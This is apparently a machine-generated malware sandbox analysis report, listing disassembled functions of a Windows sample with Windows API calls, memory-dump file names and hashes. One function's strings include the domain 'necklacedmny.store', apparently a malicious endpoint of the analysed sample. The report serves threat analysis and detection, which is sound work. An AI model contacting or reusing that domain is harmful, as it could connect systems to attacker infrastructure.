                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeSecurity
                                                                                    • String ID: 35C916D416EE552BADC046AA064005E5$Mz$necklacedmny.store$tO
                                                                                    • API String ID: 640775948-3719446291
                                                                                    • Opcode ID: 2af2c3809a87fc473dcd59c4f950edaed3a52ef28eb91863a444dbfba32baa65
                                                                                    • Instruction ID: 7f2fc3698a46a044d1fd91b58651ffca0e326a4a34ddbab507e8ad86b67aa88b
                                                                                    • Opcode Fuzzy Hash: 2af2c3809a87fc473dcd59c4f950edaed3a52ef28eb91863a444dbfba32baa65
                                                                                    • Instruction Fuzzy Hash: C7A1F1B11047818FE365CF24C8A07A6BBE2FF56304F198A9CC0D64B756D775E886CB91
                                                                                    Function 006A0DAD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: #v
                                                                                    • API String ID: 3664257935-554117064
                                                                                    • Opcode ID: a5cf2c222263fa50ee9134e878e88793b442785def3fe05860f99b5591ab90b1
                                                                                    • Instruction ID: 6b5326116fe9837d0408822c09bdbfc38336a3dea491c2effb26a2111a313348
                                                                                    • Opcode Fuzzy Hash: a5cf2c222263fa50ee9134e878e88793b442785def3fe05860f99b5591ab90b1
                                                                                    • Instruction Fuzzy Hash: C031F8711057818FD7158F29C8507A2BBE3BF9B300F28869DD0D69B752C735AC46CB50
                                                                                    Function 00680B90 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 00680C8D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 18ca7867d15db7729527ad9139f9c4bb4afefb79a1e4999f47fa2fdb3a761e82
                                                                                    • Instruction ID: 69ad15e45a8ee45a3f032816477ad0e223d8a73b8af354226b913aece426de19
                                                                                    • Opcode Fuzzy Hash: 18ca7867d15db7729527ad9139f9c4bb4afefb79a1e4999f47fa2fdb3a761e82
                                                                                    • Instruction Fuzzy Hash: 6131ECB1D10B40ABD730BA3D9A0B6177EB4A701660F40472DF8E69A6C4F230A4298BD7
                                                                                    Function 006B0E25 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 006B0ED8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 85464e9e8ec7222c7aab6e86b2034f83f2a6a42406f0f557eb3c71f62fe6b804
                                                                                    • Instruction ID: b5edee1d27eed7fc2c6605678f5a4d09af75485204d6325d662da4552a57d207
                                                                                    • Opcode Fuzzy Hash: 85464e9e8ec7222c7aab6e86b2034f83f2a6a42406f0f557eb3c71f62fe6b804
                                                                                    • Instruction Fuzzy Hash: 3A11BD33F501228BDB289F78EC616EE7755FB05324B0907B9E917E7241DA79DA414780
                                                                                    Function 006AE1B0 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 006AE204
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
